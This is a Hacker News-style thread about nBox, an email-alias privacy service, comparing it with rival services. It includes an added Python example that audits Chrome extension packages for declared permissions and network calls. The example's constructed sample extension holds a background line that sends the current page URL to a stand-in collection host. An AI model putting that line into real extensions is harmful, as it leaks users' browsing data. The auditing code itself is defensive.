2. The volume of spam you'll receive is huge. Really huge. Even if your service is only moderately successful. It costs money to keep such a service running.


Hi hota_mazi, I won't say that we can think of everything but we have these two points in mind.


Presumably if I don't want to receive spam emails I'm also unlikely to allow a website to send me notifications. I'm unlikely as well to install an extension for a very specific service I'm not going to use very often. Extensions are a privacy concern and consume memory needlessly.

If I'm willing to give a fake registration email I probably don't care about privacy and this is just for throwaway anyway. I'm not going to give any personal info to a website I don't trust with my email in the first place.

I also don't understand how this is not going to be blacklisted like any other anti-spam email service.

Maybe I'm not the target for this product but this seems to bring nothing new in a slightly more annoying way.


> Extensions are a privacy concern and consume memory needlessly.

This is somewhat tangential to your points, but I see this type of comment a lot. Chrome extensions are just renamed zip files that contain all the JS, HTML, and CSS for their extensions. It is easy to take a look at the source code if you have any privacy doubts. The author might try to obfuscate the JS, but it should be trivial to see if there are outgoing connections being made. Google also makes it simple to disable extensions with a couple clicks if you want to keep particular extensions disabled except when you are actively using them.
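The inspection described in the comment above, as an added example (not part of the thread and not any project's code): it unpacks a `.crx` or `.zip` package, lists what the manifest declares, and flags files that reference network APIs or hard-coded URLs. The sample package and its `example.invalid` URL are constructed, and the function names are this example's own.

```python
import io
import json
import re
import struct
import zipfile

NET_APIS = re.compile(r"\b(fetch|XMLHttpRequest|WebSocket|sendBeacon|EventSource)\b")
URLS = re.compile(r"""(?:https?|wss?)://[^\s"'`)<>\\]+""")
HOST_PATTERN = re.compile(r"^(\*|https?|wss?|ftp|file)://|^<all_urls>$")


def zip_offset(data: bytes) -> int:
    """Return where the ZIP starts: 0 for a plain .zip, after the header for .crx."""
    if data[:4] != b"Cr24":
        return 0
    (version,) = struct.unpack_from("<I", data, 4)
    if version == 2:  # magic, version, key length, signature length, key, signature
        key_len, sig_len = struct.unpack_from("<II", data, 8)
        return 16 + key_len + sig_len
    if version == 3:  # magic, version, header length, header
        (header_len,) = struct.unpack_from("<I", data, 8)
        return 12 + header_len
    raise ValueError(f"unknown CRX version {version}")


def audit_extension(data: bytes) -> dict:
    """Summarise declared permissions and network-capable code in a package."""
    zf = zipfile.ZipFile(io.BytesIO(data[zip_offset(data):]))
    manifest = json.loads(zf.read("manifest.json").decode("utf-8-sig"))
    declared = []
    for key in ("permissions", "optional_permissions", "host_permissions"):
        declared += [p for p in manifest.get(key, []) if isinstance(p, str)]
    injected = [m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])]
    findings = {}
    for name in zf.namelist():
        if not name.lower().endswith((".js", ".html", ".htm")):
            continue
        text = zf.read(name).decode("utf-8", errors="replace")
        apis = sorted(set(NET_APIS.findall(text)))
        urls = sorted(set(URLS.findall(text)))
        if apis or urls:
            findings[name] = {"apis": apis, "urls": urls}
    return {
        "api_permissions": sorted(p for p in declared if not HOST_PATTERN.search(p)),
        "host_access": sorted(set(injected) | {p for p in declared if HOST_PATTERN.search(p)}),
        "network_code": findings,
    }


def build_sample_crx() -> bytes:
    """Constructed sample: a CRX3-style wrapper around a small extension."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", json.dumps({
            "manifest_version": 2, "name": "sample", "version": "1.0",
            "permissions": ["activeTab", "storage", "*://*/*"],
            "background": {"scripts": ["bg.js"]},
        }))
        zf.writestr("bg.js", 'fetch("https://collect.example.invalid/u?d=" + location.href);\n')
        zf.writestr("popup.js", 'document.title = "ok";\n')
    header = b"\x00" * 20  # stand-in for the signed header, not a real signature
    return b"Cr24" + struct.pack("<II", 3, len(header)) + header + buf.getvalue()
```

A match only shows where to start reading: code that assembles URLs or API names at run time will not appear in a static scan, so an empty `network_code` is not proof that nothing is sent.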


Hi ajnin, thanks for your feedback.

> Extensions are a privacy concern and consume memory needlessly.

Yes, that's why we don't ask for any permission, so the extension only gets activated when you click on the button.

> I'm not going to give any personal info to a website I don't trust with my email in the first place

Everyone can get hacked, governments, big companies... so who do you trust enough to give your email?

> I also don't understand how this is not going to be blacklisted like any other anti-spam email service.

Some services might block our addresses some day, but that would be a mistake because nBox is not a disposable email service.


I've been using 33mail.com for years for this. I just give it an address like "hackernews@username.33mail.com" and it forwards email. If hackernews ever starts spamming, 33mail gives me a link to block it.

I love that service, it's saved me countless headaches.


Hi StavrosK, yes 33mail (and others) propose almost the same service. Two slight differences though:

- emails are less guessable with nBox

- if 33mail gets hacked, spammers will get your email address


Blur by Abine offers a similar service, it includes a password manager and the ability to mask phone and card details on the premium version. Generated email addresses can be managed on the site or through the mobile app.


The FAQ says that it's not a disposable-e-mail-generator, but the description of what it does makes it seem like that's exactly what it is. (Maybe it means that it doesn't generate random e-mail addresses from a shared pool?)

I've been a satisfied user of SpamGourmet (www.spamgourmet.com) for years, and the only (arguable) downside I've seen is how upset customer-service representatives get while reading my address. How does your service compare?


Hi JadeBN, you're right spamgourmet is very similar to nBox. Here are a few differences:

- With spamgourmet the addresses are designed to expire after X emails, so it's intended for services you don't care about.

- Once I know one spamgourmet address, I can try to guess other addresses of yours.

- We don't ask for your personal email. If spamgourmet gets hacked, spammers will get your information.


Thank you for the reply; I think that this is a useful description of the advantages of your service. Just for purposes of completely accurate comparison, though:

> - With spamgourmet the addresses are designed to expire after X emails, so it's intended for services you don't care about.

This is configurable; it can be turned off entirely (allowing a trusted sender to send an unlimited number of e-mails to an address), or the allowance can be 'refreshed' (so that, after, say, 5 e-mails sent to an address, you can allow 5 more as a further probation).


So if you shut down I no longer receive any emails I have signed up for?




Thanks, my link only works for me...


So a lot of systems these days use email password recovery, is this not just adding another attack vector?

> bdav24: Hi water42, don't ever trust anyone with your data, governments and big companies get hacked every day. Our angle: we don't ask for any personal information

You will be able to route/read all of an individual's inbound mail?


Hi markwakeford, that's something we're currently working on. All devices that access the account will have to be validated on the previous device(s) and will be displayed.

That said, for targeted attacks we won't be able to do better than Google and others, the risk is never 0.

> You will be able to route/read all of an individual's inbound mail?

You mean to handle the load? We can scale at any time if we need to, but our current setup can already handle a lot.


I am trying to understand this. Appears to offer bulk accounts that are easy to create and permanent, targeting the market that sits between a) regular email addresses, which are permanent but a pain to sign up for, needing phone verification, etc. and b) throwaway accounts that are easy to create but cannot be kept long-term.

This seems like an interesting idea if they own a whole bunch of different domains, but they don't specify this, and my attempt to sign up for an address failed. (open firefox -> click create my nBox -> click Sign up for a service (I type https://facebook.com) -> receive message saying "To create your nBox Allow the notifications" -> No simple info about how to do this is given, so I give up)


Hi iliketosleep, to allow the notifications a small window should appear at the top of the page. But not all browsers have implemented this feature. What device and browser do you use?


I'm using the latest version of firefox on win7. Upon further investigation, I think I know what happened now. There's a tiny box at the left of the address bar that enables me to unblock notifications for the site. Which means I must have automatically pressed the "disallow" button before even reading anything (a reflex response!). If I was you, I'd have an option to see a screenshot showing how to unblock notifications. It's always the stupid little things that can make a very big difference.


Ok, I'm glad it works. Thanks for the feedback, we'll try to add that somewhere.


I need this for cell #s

Having said that, I plan on using this.


This is a good idea but creating a new address for each site seems to be overcomplicating a simple problem. I just have "mynormalemailalias_spam@domain" which is used for sign ups, if I ever need to log into a site I've signed up with using that address it's easy to remember the login details and/or reset my password.


Hi synicalx, I used that method for many years too, but with time the emails end up piling up. That's manageable of course, but it feels nice to control exactly who owns your information.


This seems like it's almost "1Password for Email Addresses," which would be pretty great: go to site, hit key combination, have random/saved email inserted into login boxes. Combining that with email forwarding to my real email address that I can turn on and off is pretty powerful.


Hi mccolin, thanks for the support! :)


Why is it required to enable notifications from the nbox site in order to generate an address?


Hi cdubzzz, no it's not required.


Here is what I see after I click "GENERATE AN ADDRESS" > "Generate an address for any other reason": http://imgur.com/ktTssbB

If I click "Not Now", the prompt goes away and nothing happens. Perhaps I am misunderstanding how the service works?


Oh sorry, you're right, technically accepting webpushes is not required, but it's part of the tunnel for now. We're currently changing that, but it's not finished yet.


You'll need to fix that. As others have pointed out: If I'm not a fan of spam then I'm likely not a fan of desktop notifications either.


In my experience spammers use mostly email addresses publicly exposed (web sites, usenet, forums) and stolen address books (viruses, malware) - you can't do much about the second if that happens to your recipients.


Hi imhoguy, spammers also happen to buy leaked data sometimes to better target people. Anyway, spam is one thing we address, but that's not the main point. It's more about control of your privacy.


These days many services ask for a phone number for 2FA just to sign up, it'd be great to have a tool that gave you multiple numbers on demand so you don't have to give out your phone number.


I've been considering just buying a few prepaid SIM cards just for services like this. I'd love some throwaway phone number/ SMS-forwarding services, but most get blacklisted within a few months because spammers immediately jump all over them.


You could use Twilio for this without writing any software, but phone numbers are a much more finite resource and are therefore much more expensive.


If the service is down or I want to stop using it I'm totally screwed, though.

Usually if I forget the password to a service they can send me a reset link, what would my options be with NBox?


Hi nkkollaw, we're very careful to limit possible downtime, and there is a system of retry for incoming emails, so we should not lose some.

We're currently working on the "account creation" part of nBox.


This has existed and been free for 22 years already: http://www.mytrashmail.com/


Hi dmitrygr, the idea is not new, but the link you gave is for disposable email addresses, which are public. That's a different use-case from nBox, where the addresses are private.


use a uuid - it is as private as imaginable - you'll never guess mine


Yes, that gives you some privacy of course, but I still think it's a different use-case: with disposable email services, you're usually not notified when you receive an email, and checking all the addresses must be a pain. I'd use them for services I really don't care about and nBox for wanted and semi-wanted emails.


I tried to "Create my nbox" (or "Generate an address") and it sent me to Chrome addons site. Is it Chrome-only web service?


Hi monista, nBox is heavily based on Chrome at the moment, but a Firefox extension is coming and mobile apps may follow.


How is this different from, let's say mailhero.io?


Hi sashk, mailhero is very similar. One difference I see: email addresses are not guessable with nBox.


1. Great idea. It's been done by Blur from Abine.com which I've been using for years.

2. Possibly offer the ability to self host this?


Hi ikeboy, you're right the idea is not new. We don't plan to offer this possibility for the moment, but who knows, maybe one day.


So what's it like when NBox goes under and you can't recover your password on any of your sites?


Hi midnitewarrior, here is a post where I try to answer that (valid) concern: https://www.producthunt.com/posts/nbox/comments/483328


Yes, that is your intention, but when funding gets pulled, investors rarely like spending more money on letting things "unwind", they have no company or brand to protect, so consumers' concerns take a back seat to investors.

The other problem with this is that there is now a middle man in my security chain. If you get hacked, potentially all of my accounts can be hacked. If you have a rogue employee, same thing. If you have a flaw in your security, I too am at risk from a centralized source.


Curious as to how they get ramen profitable off of this? Anyone got any ideas?


Hi jv22222, we don't get ramen off of this project. We plan to add paying functionalities some day if they make sense.


Randomly saw this, a typo on the first slider image - Navigate :)


These get banned quickly, just a heads up


So wait, so instead of giving your email address, you're giving another email address? That's just like email addresses with extra steps.


Exactly! And it brings a lot of benefits.


The first thing I saw was "naviguate". Um, no, if you can't even manage to run a spell checker I don't think I can trust you.


Hi irrational, that's fixed now, thanks. We're not native English speakers, so mistakes can slip through.


How do I know I can trust the security and privacy of this?


Hi water42, don't ever trust anyone with your data, governments and big companies get hacked every day. Our angle: we don't ask for any personal information.


s/additionnal/additional/


It's a neat concept and useful especially for heavy internet users.



